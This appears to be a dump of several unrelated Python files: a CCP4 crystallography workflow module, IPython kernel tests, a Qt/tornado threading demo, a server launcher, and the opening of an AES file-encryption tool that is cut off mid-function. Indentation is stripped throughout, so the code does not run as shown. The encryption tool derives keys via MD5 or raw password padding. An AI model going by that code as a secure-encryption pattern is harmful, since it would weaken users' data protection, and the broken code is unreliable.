parse_output = job.parse()
utils.put('%s' % (parse_output or ''))
if parse_output:
utils.log_value('info', parse_output)
if self.enable_logs:
self._write_logs(job)
for k, v in job.data.items():
if k != 'info':
utils.log_value(k, v)
if job.exit_status != 0:
utils.log_value('exit_status', job.exit_status)
def _write_logs(self, job):
log_basename = '%02d-%s' % (len(self.jobs), job.name.replace(' ', '_'))
for output in (job.out, job.err):
output.save_output(self.output_dir, log_basename)
def remove_hetatm(self, xyzin, xyzout, remove_all):
with open(self.path(xyzout), 'w') as out:
return pdb.remove_hetatm(self.path(xyzin), out, remove_all)
def read_pdb_metadata(self, xyzin, print_errors):
if xyzin not in self.file_info:
self.file_info[xyzin] = pdb.read_metadata(self.path(xyzin),
print_errors)
return self.file_info[xyzin]
def read_mtz_metadata(self, hklin):
if hklin not in self.file_info:
self.file_info[hklin] = mtz.read_metadata(self.path(hklin))
return self.file_info[hklin]
def count_mtz_missing(self, hklin, col):
key = (hklin, 'missing', col)
if key not in self.file_info:
self.file_info[key] = mtz.get_num_missing(self.path(hklin), col)
return self.file_info[key]
def molrep(self, f, m, keys=''):
job = Job(self, utils.cbin('molrep'))
job.args += ['-f', f, '-m', m]
if keys:
job.args.append('-i')
job.std_input = keys.strip() + '\nend'
return job
def phaser_auto(self, hklin, labin, model, root, sg_alt, opt):
lines = [ # noqa
'MODE MR_AUTO',
'SEARCH METHOD FAST',
'SEARCH DEEP OFF',
'ENSEMBLE p PDBFILE "%(pdb)s" IDENTITY %(identity)g' % model,
# if --no-hetatm was used HETATM records are already removed
'ENSEMBLE p HETATOM ON',
'SEARCH ENSEMBLE p NUM %(num)d' % model,
'HKLIN "%s"' % hklin,
'LABIN %s' % labin,
'SGALTERNATIVE SELECT %s' % sg_alt,
'ROOT %s' % root,
            # Since Phaser 2.5.6, template-matched solutions are moved to the
            # template solution origin, which is better than getting a
            # solution one cell away, so we set the template here.
'SOLUTION TEMPLATE original_model',
'SOLUTION 6DIM ENSE p EULER 0 0 0 FRAC 0 0 0',
# Final refinement with too high resolution crashes
# with std::bad_alloc, even with 8GB of memory.
'RESOLUTION AUTO HIGH 2.0', # ignored by Phaser if > RESO HIGH
]
if model['mw']:
lines += ['COMPOSITION PROTEIN MW %(mw)f NUMBER %(num)d' % model]
else:
lines += ['COMPOSITION BY AVERAGE']
if opt.slow < 2:
lines += ['KILL TIME 180', # 3h is much more than we want
# 'MACANO PROTOCOL OFF',
'PURGE ROT NUM 7',
'PURGE TRA NUM 20',
'PURGE RNP NUM 10']
if opt.mr_reso > 10: # in this case it's not a reso
lines += ['ELLG TARGET %g' % opt.mr_reso]
else:
lines += ['RESOLUTION HIGH %g' % opt.mr_reso]
# tNCS: we go with what phaser does by default -- tNCS of order 2
# are handled automatically. While we could specify tNCS for
# pseudo-tripling/quadrupling of the cell (TNCS NMOL 3) I don't know
# if it'd do more good or bad.
job = ccp4_job(self, 'phaser', ki=lines, parser='_phaser_parser')
return job
def ensembler(self, pdbin, root):
job = Job(self, 'phaser.ensembler')
job.name = 'ensembler'
job.args += ['root=%s' % root, pdbin]
job.parser = '_ensembler_parser'
return job
# functions below use logical=locals()
# pylint: disable=unused-argument
def pointless(self, hklin, xyzin, hklref=None, hklout=None, keys=''):
return ccp4_job(self, 'pointless', logical=locals(), ki=keys,
parser='_pointless_parser')
def unique(self, hklout, ref, resolution,
labout='F=F_UNIQUE SIGF=SIGF_UNIQUE'):
        # Also include reflections that may be present in other spacegroups
        # belonging to the same pointgroup
        # (ignore systematic absences from screw axes by removing screw axes).
return ccp4_job(self, 'unique', logical=locals(),
ki=['cell %g %g %g %g %g %g' % tuple(ref.cell),
"symmetry '%s'" % ref.unscrewed_symmetry(),
'resolution %.3f' % resolution,
'labout %s' % labout],
parser='')
def freerflag(self, hklin, hklout, keys='', parser=''):
return ccp4_job(self, 'freerflag', logical=locals(), ki=keys,
parser=parser)
#def reindex(self, hklin, hklout, symmetry):
# return ccp4_job(self, 'reindex', logical=locals(),
# ki=["symmetry '%s'" % symmetry,
# 'reindex h,k,l'])
def truncate(self, hklin, hklout, labin, labout):
return ccp4_job(self, 'truncate', logical=locals(),
ki=['labin %s' % labin, 'labout %s' % labout,
'NOHARVEST'],
parser='_truncate_parser')
def ctruncate(self, hklin, hklout, colin, colano):
job = Job(self, 'ctruncate')
job.args += ['-hklin', hklin, '-hklout', hklout, '-colin', colin]
if colano:
job.args += ['-colano', colano]
job.parser = '_ctruncate_parser'
return job
def cad(self, data_in, hklout, keys):
assert isinstance(data_in, list)
hklin_args = []
labin = []
for n, (hklin, labels) in enumerate(data_in):
labels = [a for a in labels if a not in ('H', 'K', 'L')]
hklin_args += ['HKLIN%d' % (n+1), hklin]
labin.append('labin file %d ' % (n+1) +
' '.join('E%d=%s' % (k+1, label)
for k, label in enumerate(labels)))
job = ccp4_job(self, 'cad', logical={}, ki=(labin + keys),
parser='_cad_parser')
job.args += hklin_args + ['HKLOUT', hklout]
return job
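# Illustrative note (hypothetical file and column names): for
# data_in=[('native.mtz', ['H', 'K', 'L', 'FP', 'SIGFP'])] the H/K/L columns
# are dropped, cad() emits the keyword line 'labin file 1 E1=FP E2=SIGFP'
# and adds 'HKLIN1 native.mtz' plus 'HKLOUT <hklout>' to the job arguments.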
def pdbset(self, xyzin, xyzout, cell):
return ccp4_job(self, 'pdbset', logical=locals(),
ki=['cell %g %g %g %g %g %g' % cell])
def refmac5(self, hklin, xyzin, hklout, xyzout, labin, libin, keys):
inp = ['labin %s' % labin] + keys.splitlines()
#inp += ['free 6'] # for testing
job = ccp4_job(self, 'refmac5', logical=locals(), ki=inp,
parser='_refmac_parser')
words = keys.split()
ref_type = '?'
for n, w in enumerate(words[:-2]):
if w == 'refinement' and words[n+1] == 'type':
ref_type = words[n+2][:5]
elif w == 'ridge':
ref_type = 'jelly'
job.name += ' ' + ref_type
job.data['ncyc'] = -1
for n, w in enumerate(words[:-1]):
if w.startswith('ncyc'):
job.data['ncyc'] = int(words[n+1])
return job
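# Illustrative note (hypothetical keywords): for keys containing
# 'refinement type restrained' and 'ncyc 8' the job is named 'refmac5 restr'
# and job.data['ncyc'] is set to 8; a 'ridge' keyword yields 'refmac5 jelly'.
# get_final_refinement_job() below relies on these job names.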
def get_final_refinement_job(self):
for job in reversed(self.jobs):
if job.name in ('refmac5 restr', 'refmac5 jelly'):
return job
def findwaters(self, pdbin, hklin, f, phi, pdbout, sigma=2.0):
job = Job(self, 'findwaters')
job.args += ['--pdbin', pdbin, '--hklin', hklin, '--f', f, '--phi', phi,
'--pdbout', pdbout, '--sigma', '%g' % sigma]
return job
def find_blobs(self, hklin, xyzin, sigma=1.0):
# for now search in PATH (which normally includes CBIN)
job = Job(self, utils.syspath('find-blobs'))
job.args += ['-c', '-s%g' % sigma, hklin, xyzin]
job.parser = '_find_blobs_parser'
return job
def mtz2sca(self, mtzin, scaout):
job = Job(self, utils.syspath('mtz2sca'))
job.args += [mtzin, scaout]
return job
def shelxc(self, scain, cell, symmetry):
job = Job(self, utils.syspath('shelxc'))
name = os.path.splitext(scain)[0]
job.args += [name]
job.std_input = '\n'.join([
'SAD %s' % scain,
'CELL %s %s %s %s %s %s' % cell,
'SPAG %s' % symmetry,
])
return job
def anode(self, name):
job = Job(self, utils.syspath('anode'))
job.args += [name]
job.parser = '_anode_parser'
return job
def rwcontents(self, xyzin):
return ccp4_job(self, 'rwcontents', logical=dict(xyzin=xyzin),
parser='_rwcontents_parser')
def coot_py(self, script_text):
job = Job(self, coots.find_path())
job.args += ['--python', '--no-graphics', '--no-guano']
script_text += '\ncoot_real_exit(0)'
# On some Wincoot installations coot-real.exe is started from
# runwincoot.bat directly, and on some as "start ... coot-real ...".
# There is no way afaics to pipe stdin to coot-real.
if os.name == 'nt':
helper_path = self.path('r3d.py')
with open(helper_path, 'w') as f:
f.write(script_text)
job.args.append(helper_path)
else:
job.std_input = script_text
return job
def render_r3d(self, name, img_format):
assert img_format is not None
job = Job(self, utils.syspath('render'))
# render writes normal output to stderr (and nothing to stdout)
job.out.file_extension = 'out'
job.err.file_extension = 'log'
job.args += ['-'+img_format, '%s.%s' % (name, img_format)]
job.stdin_file = name + '.r3d'
job.parser = ' %s.%s' % (name, img_format)
return job
def copy_uncompressed(self, src, dst):
src_fullpath = self.path(src)
dst_fullpath = self.path(dst)
if src.endswith('.gz'):
with gzip.open(src_fullpath, 'rb') as fsrc:
content = fsrc.read()
with open(dst_fullpath, 'wb') as fdst:
fdst.write(content)
else:
try:
shutil.copyfile(src_fullpath, dst_fullpath)
except shutil.Error: # == SameFileError in Python 3.4+
pass
def delete_files(self, filenames):
for f in filenames:
path = self.path(f)
if os.path.exists(path):
try:
os.remove(path)
except OSError as e:
utils.put_error(e)
def open_pickled_workflow(file_or_dir):
if os.path.isdir(file_or_dir):
pkl = os.path.join(file_or_dir, PICKLE_FILENAME)
else:
pkl = file_or_dir
if not os.path.exists(pkl):
utils.put_error('workflow data file not found',
'No such file or directory: %s' % pkl)
sys.exit(1)
f = open(pkl, 'rb')
try:
return pickle.load(f)
except pickle.UnpicklingError:
utils.put_error('"Unpickling" failed',
'Maybe this is not a pickle file: %s' % pkl)
sys.exit(1)
def _write_workflow_steps(wf, output):
for n, job in enumerate(wf.jobs):
output.write('\n%3d %-15s' % (n+1, job.name))
if job.started:
started_at = time.localtime(job.started)
output.write(time.strftime(' %Y-%m-%d %H:%M', started_at))
output.write(' %7.1fs' % job.total_time)
output.write('\n')
def show_workflow_info(wf, mesg_dict):
sys.stdout.write('%s\n' % wf)
sys.stdout.write('Command:\n' + ' '.join(pipes.quote(a) for a in wf.argv))
_write_workflow_steps(wf, sys.stdout)
sys.stderr.write("""
To see details, specify step(s):
%(prog)s info %(output_dir)s STEPS
To re-run selected steps (for debugging):
%(prog)s repeat %(output_dir)s [STEPS]
where STEPS is one or more numbers or a range (examples: 1,2 4-6 8-)
""" % mesg_dict)
def show_job_info(job):
sys.stdout.write('%s\n' % job)
sys.stdout.write(job.args_as_str() + '\n')
if job.total_time:
sys.stdout.write('Total time: %.1fs\n' % job.total_time)
if job.parser and job.parse():
sys.stdout.write('Output summary: %s\n' % job.parse())
if job.out.saved_to:
sys.stdout.write('stdout: %s\n' % job.out.summary())
if job.err.saved_to:
sys.stdout.write('stderr: %s\n' % job.err.summary())
def parse_steps(args, wf):
jobs = []
for arg in args:
try:
for s in arg.split(','):
if '-' in s:
a_, b_ = s.split('-')
a = (int(a_) if a_ != '' else 1)
b = (int(b_) if b_ != '' else len(wf.jobs))
if a == 0 or b == 0:
raise ValueError()
jobs += [wf.jobs[n-1] for n in range(a, b+1)]
else:
jobs.append(wf.jobs[int(s)-1])
except (ValueError, IndexError) as e:
sys.stderr.write('Invalid step number(s): %s\n(%s)\n' % (arg, e))
sys.exit(1)
return jobs
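# Worked example (hypothetical workflow with 9 jobs): the step spec
# "1,2 4-6 8-" passed as three arguments selects jobs 1, 2, 4, 5, 6, 8 and 9;
# an open-ended range such as "8-" runs through the last job.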
def parse_workflow_commands():
prog = __package__ or os.path.basename(sys.argv[0])
args = sys.argv[1:]
if not args or args[0] not in ('info', 'repeat'):
return False
if len(args) == 1:
sys.stderr.write('Specify output_dir.\n')
return True
# it's handy to use "/my/path/05-cad.log" as "/my/path" "5"
ext = os.path.splitext(args[1])[1]
if os.path.isfile(args[1]) and ext in ('.log', '.err'):
dirname, basename = os.path.split(args[1])
args[1:2] = [dirname, basename.split('-')[0]]
wf = open_pickled_workflow(args[1])
steps = args[2:]
if not steps:
show_workflow_info(wf, dict(prog=prog, output_dir=args[1]))
return True
for job in parse_steps(steps, wf):
if args[0] == 'info':
show_job_info(job)
elif args[0] == 'repeat':
try:
job.data = {} # reset data from parsing
job.run()
utils.comment('\n')
except JobError as e:
utils.put_error(e.msg, comment=e.note)
sys.exit(1)
return True
commands_help = """\
All files are stored in the specified output directory.
For a quick summary (after running the program): %(prog)s info OUTPUT_DIR
"""
if __name__ == '__main__':
def test_parser(name, logfile):
parser = globals()['_%s_parser' % name]
job = Job(None, name)
job.out.que = queue.Queue()
with open(logfile) as f:
for line in f:
job.out.que.put(line)
parser(job)
for k in sorted(job.data.keys()):
print('%s %s' % (k, job.data[k]))
assert len(sys.argv) == 3
test_parser(sys.argv[1], logfile=sys.argv[2])
|
test_kernel.py
|
# coding: utf-8
"""test the IPython Kernel"""
# Copyright (c) IPython Development Team.
# Distributed under the terms of the Modified BSD License.
import io
import os.path
import sys
import nose.tools as nt
from IPython.testing import decorators as dec, tools as tt
from IPython.utils import py3compat
from IPython.utils.path import locate_profile
from IPython.utils.tempdir import TemporaryDirectory
from .utils import (new_kernel, kernel, TIMEOUT, assemble_output, execute,
flush_channels, wait_for_idle)
def _check_mp_mode(kc, expected=False, stream="stdout"):
execute(kc=kc, code="import sys")
flush_channels(kc)
msg_id, content = execute(kc=kc, code="print (sys.%s._check_mp_mode())" % stream)
stdout, stderr = assemble_output(kc.iopub_channel)
nt.assert_equal(eval(stdout.strip()), expected)
# printing tests
def test_simple_print():
"""simple print statement in kernel"""
with kernel() as kc:
iopub = kc.iopub_channel
msg_id, content = execute(kc=kc, code="print ('hi')")
stdout, stderr = assemble_output(iopub)
nt.assert_equal(stdout, 'hi\n')
nt.assert_equal(stderr, '')
_check_mp_mode(kc, expected=False)
def test_sys_path():
"""test that sys.path doesn't get messed up by default"""
with kernel() as kc:
msg_id, content = execute(kc=kc, code="import sys; print (repr(sys.path[0]))")
stdout, stderr = assemble_output(kc.iopub_channel)
nt.assert_equal(stdout, "''\n")
def test_sys_path_profile_dir():
"""test that sys.path doesn't get messed up when `--profile-dir` is specified"""
with new_kernel(['--profile-dir', locate_profile('default')]) as kc:
msg_id, content = execute(kc=kc, code="import sys; print (repr(sys.path[0]))")
stdout, stderr = assemble_output(kc.iopub_channel)
nt.assert_equal(stdout, "''\n")
@dec.knownfailureif(sys.platform == 'win32', "subprocess prints fail on Windows")
def test_subprocess_print():
"""printing from forked mp.Process"""
with new_kernel() as kc:
iopub = kc.iopub_channel
_check_mp_mode(kc, expected=False)
flush_channels(kc)
np = 5
code = '\n'.join([
"from __future__ import print_function",
"import multiprocessing as mp",
"pool = [mp.Process(target=print, args=('hello', i,)) for i in range(%i)]" % np,
"for p in pool: p.start()",
"for p in pool: p.join()"
])
expected = '\n'.join([
"hello %s" % i for i in range(np)
]) + '\n'
msg_id, content = execute(kc=kc, code=code)
stdout, stderr = assemble_output(iopub)
nt.assert_equal(stdout.count("hello"), np, stdout)
for n in range(np):
nt.assert_equal(stdout.count(str(n)), 1, stdout)
nt.assert_equal(stderr, '')
_check_mp_mode(kc, expected=False)
_check_mp_mode(kc, expected=False, stream="stderr")
def test_subprocess_noprint():
"""mp.Process without print doesn't trigger iostream mp_mode"""
with kernel() as kc:
iopub = kc.iopub_channel
np = 5
code = '\n'.join([
"import multiprocessing as mp",
"pool = [mp.Process(target=range, args=(i,)) for i in range(%i)]" % np,
"for p in pool: p.start()",
"for p in pool: p.join()"
])
msg_id, content = execute(kc=kc, code=code)
stdout, stderr = assemble_output(iopub)
nt.assert_equal(stdout, '')
nt.assert_equal(stderr, '')
_check_mp_mode(kc, expected=False)
_check_mp_mode(kc, expected=False, stream="stderr")
@dec.knownfailureif(sys.platform == 'win32', "subprocess prints fail on Windows")
def test_subprocess_error():
"""error in mp.Process doesn't crash"""
with new_kernel() as kc:
iopub = kc.iopub_channel
code = '\n'.join([
"import multiprocessing as mp",
"p = mp.Process(target=int, args=('hi',))",
"p.start()",
"p.join()",
])
msg_id, content = execute(kc=kc, code=code)
stdout, stderr = assemble_output(iopub)
nt.assert_equal(stdout, '')
nt.assert_true("ValueError" in stderr, stderr)
_check_mp_mode(kc, expected=False)
_check_mp_mode(kc, expected=False, stream="stderr")
# raw_input tests
def test_raw_input():
"""test [raw_]input"""
with kernel() as kc:
iopub = kc.iopub_channel
input_f = "input" if py3compat.PY3 else "raw_input"
theprompt = "prompt> "
code = 'print({input_f}("{theprompt}"))'.format(**locals())
msg_id = kc.execute(code, allow_stdin=True)
msg = kc.get_stdin_msg(block=True, timeout=TIMEOUT)
nt.assert_equal(msg['header']['msg_type'], u'input_request')
content = msg['content']
nt.assert_equal(content['prompt'], theprompt)
text = "some text"
kc.input(text)
reply = kc.get_shell_msg(block=True, timeout=TIMEOUT)
nt.assert_equal(reply['content']['status'], 'ok')
stdout, stderr = assemble_output(iopub)
nt.assert_equal(stdout, text + "\n")
@dec.skipif(py3compat.PY3)
def test_eval_input():
"""test input() on Python 2"""
with kernel() as kc:
iopub = kc.iopub_channel
input_f = "input" if py3compat.PY3 else "raw_input"
theprompt = "prompt> "
code = 'print(input("{theprompt}"))'.format(**locals())
msg_id = kc.execute(code, allow_stdin=True)
msg = kc.get_stdin_msg(block=True, timeout=TIMEOUT)
nt.assert_equal(msg['header']['msg_type'], u'input_request')
content = msg['content']
nt.assert_equal(content['prompt'], theprompt)
kc.input("1+1")
reply = kc.get_shell_msg(block=True, timeout=TIMEOUT)
nt.assert_equal(reply['content']['status'], 'ok')
stdout, stderr = assemble_output(iopub)
nt.assert_equal(stdout, "2\n")
def test_save_history():
# Saving history from the kernel with %hist -f was failing because of
# unicode problems on Python 2.
with kernel() as kc, TemporaryDirectory() as td:
file = os.path.join(td, 'hist.out')
execute(u'a=1', kc=kc)
wait_for_idle(kc)
execute(u'b=u"abcþ"', kc=kc)
wait_for_idle(kc)
_, reply = execute("%hist -f " + file, kc=kc)
nt.assert_equal(reply['status'], 'ok')
with io.open(file, encoding='utf-8') as f:
content = f.read()
nt.assert_in(u'a=1', content)
nt.assert_in(u'b=u"abcþ"', content)
def test_help_output():
"""ipython kernel --help-all works"""
tt.help_all_output_test('kernel')
def test_is_complete():
with kernel() as kc:
# There are more test cases for this in core - here we just check
# that the kernel exposes the interface correctly.
kc.is_complete('2+2')
reply = kc.get_shell_msg(block=True, timeout=TIMEOUT)
assert reply['content']['status'] == 'complete'
# SyntaxError should mean it's complete
kc.is_complete('raise = 2')
reply = kc.get_shell_msg(block=True, timeout=TIMEOUT)
assert reply['content']['status'] == 'invalid'
kc.is_complete('a = [1,\n2,')
reply = kc.get_shell_msg(block=True, timeout=TIMEOUT)
assert reply['content']['status'] == 'incomplete'
assert reply['content']['indent'] == ''
def test_complete():
with kernel() as kc:
execute(u'a = 1', kc=kc)
wait_for_idle(kc)
cell = 'import IPython\nb = a.'
kc.complete(cell)
reply = kc.get_shell_msg(block=True, timeout=TIMEOUT)
c = reply['content']
nt.assert_equal(c['status'], 'ok')
nt.assert_equal(c['cursor_start'], cell.find('a.'))
nt.assert_equal(c['cursor_end'], cell.find('a.') + 2)
matches = c['matches']
nt.assert_greater(len(matches), 0)
for match in matches:
nt.assert_equal(match[:2], 'a.')
|
qt_and_tornado.py
|
__author__ = 'breddels'
"""
Demonstrates combining Qt and tornado, both of which want to have their own event loop.
The solution is to run tornado in a thread; the issue is that callbacks will then also be executed in that thread, and Qt doesn't like that.
To fix this, I show how to execute the callback in the main thread, using a Qt signal/event in combination with Promises.
The output of the program is:
fetch page, we are in thread <_MainThread(MainThread, started 47200787479520)>
response is 191548 bytes, we are in thread <Thread(Thread-1, started daemon 47201018689280)>
the other thread should fulfil the result to this promise, we are in thread <Thread(Thread-1, started daemon 47201018689280)>
we received a promise, let us fulfill it, and are in thread <_MainThread(MainThread, started 47200787479520)>
let us set the background to orange, we are in thread <_MainThread(MainThread, started 47200787479520)>
The magic happens in this line:
.then(self.move_to_gui_thread)
Without it, you'll see something like this:
fetch page, we are in thread <_MainThread(MainThread, started 47822588292064)>
response is 191604 bytes, we are in thread <Thread(Thread-1, started daemon 47822819497728)>
let us set the background to orange, we are in thread <Thread(Thread-1, started daemon 47822819497728)>
QPixmap: It is not safe to use pixmaps outside the GUI thread
"""
from aplus import Promise # https://github.com/xogeny/aplus
import threading
import tornado
from tornado.httpclient import AsyncHTTPClient
from PyQt4 import QtGui
from PyQt4 import QtCore
import sys
# tornado works with futures, this wraps it in a promise
def wrap_future_with_promise(future):
promise = Promise()
def callback(future):
e = future.exception()
if e:
promise.reject(e)
else:
promise.fulfill(future.result())
future.add_done_callback(callback)
return promise
class Window(QtGui.QMainWindow):
signal_promise = QtCore.pyqtSignal(object, object)
def __init__(self):
QtGui.QMainWindow.__init__(self)
self.button = QtGui.QPushButton("Async fetch using tornado", self)
self.button.resize(self.button.sizeHint())
self.button.clicked.connect(self.on_click)
self.signal_promise.connect(self.on_signal_promise)
def on_click(self, *args):
print "fetch page, we are in thread", threading.currentThread()
client = AsyncHTTPClient()
future = client.fetch("http://www.google.com/")
promise = wrap_future_with_promise(future)
# without .then(self.move_to_gui_thread), Qt will complain
promise.then(self.show_output)\
.then(self.move_to_gui_thread)\
.then(self.do_gui_stuff)\
.then(None, self.on_error)
def move_to_gui_thread(self, value):
promise = Promise()
print "the other thread should fulfil the result to this promise, we are in thread", threading.currentThread()
self.signal_promise.emit(promise, value)
return promise
def on_signal_promise(self, promise, value):
print "we received a promise, let us fulfill it, and are in thread", threading.currentThread()
promise.fulfill(value)
def on_error(self, error):
print "error", error
def show_output(self, response):
print "response is", len(response.body), "bytes, we are in thread", threading.currentThread()
def do_gui_stuff(self, response):
print "let us set the background to orange, we are in thread", threading.currentThread()
# this Qt call should only be done from the main thread
self.setStyleSheet("background-color: orange;")
# run the tornado loop in a separate thread
thread = threading.Thread(target=lambda : tornado.ioloop.IOLoop.current().start())
thread.setDaemon(True)
thread.start()
app = QtGui.QApplication(sys.argv)
window = Window()
window.show()
app.exec_()
|
server.py
|
from waitress import serve
import logging
import asyncio
import threading
from services.streaming.backend import app
# Local
from services.streaming.lib import StreamingAnalytics
from services.streaming.config import collect_env_vars
logger = logging.getLogger('waitress')
logger.setLevel(logging.INFO)
def start_analytics():
asyncio.set_event_loop(asyncio.new_event_loop())
creds = collect_env_vars("API_ID", "API_HASH", "SESSION")
analytics_module = StreamingAnalytics(**creds)
analytics_module.init_client()
def start_server():
asyncio.set_event_loop(asyncio.new_event_loop())
serve(app, host='0.0.0.0', port=8080)
analytics_thread = threading.Thread(target=start_analytics, args=())
analytics_thread.daemon = True
analytics_thread.start()
server_thread = threading.Thread(target=start_server, args=())
server_thread.daemon = True
server_thread.start()
analytics_thread.join()
server_thread.join()
|
lock_files.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
Encrypt and decrypt files using AES encryption and a common
password. You can use it to lock files before they are uploaded to
storage services like Dropbox or Google Drive.
The password can be stored in a safe file, specified on the command
line or it can be manually entered each time the tool is run.
Here is how you would use this tool to encrypt a number of files.
You can optionally specify the --lock switch but, since it is the
default, it is not necessary.
$ lock_files.py file1.txt file2.txt dir1 dir2
Password: secret
Re-enter password: secret
When the lock command is finished, all of the files will be locked (encrypted,
with a ".locked" extension).
You can lock the same files multiple times with different
passwords. Each time lock_files.py is run in lock mode, another
".locked" extension is appended. Each time it is run in unlock mode, a
".locked" extension is removed. Unlock mode is enabled by specifying
the --unlock option.
Of course, entering the password manually each time can be a challenge.
It is normally easier to create a read-only file that can be re-used.
Here is how you would do that.
$ cat >password-file <<EOF
thisismysecretpassword
EOF
$ chmod 0600 password-file
You can now use the password file like this to lock and unlock a file.
$ lock_files.py -p password-file file1.txt
$ lock_files.py -p password-file --unlock file1.txt.locked
In decrypt mode, the tool walks through the specified files and
directories looking for files with the .locked extension and unlocks
(decrypts) them.
Here is how you would use this tool to decrypt a file, execute a
program and then re-encrypt it when the program exits.
$ # the unlock operation removes the .locked extension
$ lock_files.py -p ./password --unlock file1.txt.locked
$ edit file1.txt
$ lock_files.py -p ./password file1.txt
The tool checks each file to make sure that it is writeable before
processing. If any file is not writeable, the program reports an
error and exits unless you specify --warn in which case it
reports a warning that the file will be ignored and continues.
If you want to change a file in place you can use --inplace mode.
See the documentation for that option to get more information.
If you want to encrypt and decrypt files so that they can be
processed using openssl, you must use compatibility mode (-c).
Here is how you could encrypt a file using lock_files.py and
decrypt it using openssl.
$ lock_files.py -P secret --lock file1.txt
$ ls file1*
file1.txt.locked
$ openssl enc -aes-256-cbc -d -a -salt -pass pass:secret -in file1.txt.locked -out file1.txt
Here is how you could encrypt a file using openssl and then
decrypt it using lock_files.py.
$ openssl enc -aes-256-cbc -e -a -salt -pass pass:secret -in file1.txt -out file1.txt.locked
$ ls file1*
file1.txt file1.txt.locked
$ lock_files.py -c -W -P secret --unlock file1.txt.locked
$ ls file1*
file1.txt
Note that you have to use the -W option to change errors to
warnings because the file1.txt output file already exists.
'''
import argparse
import base64
import getpass
import hashlib
import inspect
import multiprocessing
import os
import subprocess
import sys
import threading
from threading import Thread, Lock, Semaphore
try:
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.backends import default_backend
except ImportError as exc:
print('ERROR: Import failed, you may need to run "pip install cryptography".\n{:>7}{}'.format('', exc))
sys.exit(1)
try:
import Queue as queue # python 2
except ImportError:
import queue # python3
# ================================================================
#
# Module scope variables.
#
# ================================================================
VERSION = '1.1.1'
th_mutex = Lock() # mutex for thread IO
th_semaphore = None # semaphore to limit max active threads
th_abort = False # If true, abort all threads
# ================================================================
#
# Classes.
#
# ================================================================
class AESCipher:
'''
Class that provides an object to encrypt or decrypt a string
or a file.
CITATION: http://joelinoff.com/blog/?p=885
'''
def __init__(self, openssl=False, digest='md5', keylen=32, ivlen=16):
'''
Initialize the object.
@param openssl Operate identically to openssl.
@param digest The digest used.
@param keylen The key length (32-256, 16-128, 8-64).
@param ivlen Length of the initialization vector.
'''
self.m_openssl = openssl
self.m_openssl_prefix = b'Salted__' # Hardcoded into openssl.
self.m_openssl_prefix_len = len(self.m_openssl_prefix)
self.m_digest = getattr(__import__('hashlib', fromlist=[digest]), digest)
self.m_keylen = keylen
self.m_ivlen = ivlen
if keylen not in [8, 16, 32]:
err('invalid keylen {}, must be 8, 16 or 32'.format(keylen))
if openssl and ivlen != 16:
err('invalid ivlen size {}, for openssl compatibility it must be 16'.format(ivlen))
def encrypt(self, password, plaintext):
'''
Encrypt the plaintext using the password, optionally using an
openssl compatible encryption algorithm.
If it is run in openssl compatibility mode, it is the same as
running openssl like this:
$ openssl enc -aes-256-cbc -e -a -salt -pass pass:<password> -in plaintext
@param password The password.
@param plaintext The plaintext to encrypt.
'''
# Setup key and IV for both modes.
if self.m_openssl:
salt = os.urandom(self.m_ivlen - len(self.m_openssl_prefix))
key, iv = self._get_key_and_iv(password, salt)
if key is None or iv is None:
return None
else:
# No 'Salted__' prefix.
key = self._get_password_key(password)
iv = os.urandom(self.m_ivlen) # IV is the same as block size for CBC mode
# Key
key = self._encode(key)
# Encrypt
padded_plaintext = self._pkcs7_pad(plaintext, self.m_ivlen)
backend = default_backend()
cipher = Cipher(algorithms.AES(key), modes.CBC(iv), backend=backend)
encryptor = cipher.encryptor()
ciphertext_binary = encryptor.update(padded_plaintext) + encryptor.finalize()
# Finalize
if self.m_openssl:
# Make openssl compatible.
# I first discovered this when I wrote the C++ Cipher class.
# CITATION: http://projects.joelinoff.com/cipher-1.1/doxydocs/html/
openssl_compatible = self.m_openssl_prefix + salt + ciphertext_binary
ciphertext = base64.b64encode(openssl_compatible)
else:
ciphertext = base64.b64encode(iv + ciphertext_binary)
return ciphertext
def decrypt(self, password, ciphertext):
'''
Decrypt the ciphertext using the password, optionally using an
openssl compatible decryption algorithm.
If it was encrypted in openssl compatible mode, it is the same
as running the following openssl decryption command:
$ egrep -v '^#|^$' | openssl enc -aes-256-cbc -d -a -salt -pass pass:<password> -in ciphertext
@param password The password.
@param ciphertext The ciphertext to decrypt.
@returns the decrypted data.
'''
if self.m_openssl:
# Base64 decode
ciphertext_prefixed_binary = base64.b64decode(ciphertext)
if ciphertext_prefixed_binary[:self.m_openssl_prefix_len] != self.m_openssl_prefix:
err('bad header, cannot decrypt')
salt = ciphertext_prefixed_binary[self.m_openssl_prefix_len:self.m_ivlen] # get the salt
# Now create the key and iv.
key, iv = self._get_key_and_iv(password, salt)
if key is None or iv is None:
return None
else:
key = self._get_password_key(password)
ciphertext_prefixed_binary = base64.b64decode(ciphertext)
iv = ciphertext_prefixed_binary[:self.m_ivlen] # IV is the same as block size for CBC mode
# Key
key = self._encode(key)
# Decrypt
ciphertext_binary = ciphertext_prefixed_binary[self.m_ivlen:]
backend = default_backend()
cipher = Cipher(algorithms.AES(key), modes.CBC(iv), backend=backend)
decryptor = cipher.decryptor()
padded_plaintext = decryptor.update(ciphertext_binary) + decryptor.finalize()
plaintext = self._pkcs7_unpad(padded_plaintext)
return plaintext
def _get_password_key(self, password):
'''
Pad the password if necessary.
This is used by encrypt and decrypt.
Note that the password could be hashed here instead. This
approach is used to maintain backward compatibility.
'''
if len(password) >= self.m_keylen:
key = password[:self.m_keylen]
else:
key = self._pkcs7_pad(password, self.m_keylen)
return key
def _get_key_and_iv(self, password, salt):
'''
Derive the key and the IV from the given password and salt.
This is a niftier implementation than my implementation in C++
because I modified it to support different digests.
@param password The password to use as the seed.
@param salt The salt.
'''
try:
# Ignore is okay here because it will be symmetric for
# both encrypt and decrypt operations.
password = password.encode('utf-8', 'ignore')
maxlen = self.m_keylen + self.m_ivlen
keyiv = self.m_digest(password + salt).digest()
digest = keyiv
while len(keyiv) < maxlen:
digest = self.m_digest(digest + password + salt).digest()
keyiv += digest # append the last 16 bytes
key = keyiv[:self.m_keylen]
iv = keyiv[self.m_keylen:self.m_keylen + self.m_ivlen]
return key, iv
except UnicodeDecodeError as exc:
err('failed to generate key and iv: {}'.format(exc))
return None, None
def _encode(self, val):
'''
Encode a string for Python 2/3 compatibility.
'''
if isinstance(val, str):
try:
val = val.encode('utf-8')
except UnicodeDecodeError:
pass # python 2, don't care
return val
def _pkcs7_pad(self, text, size):
'''
PKCS#7 padding.
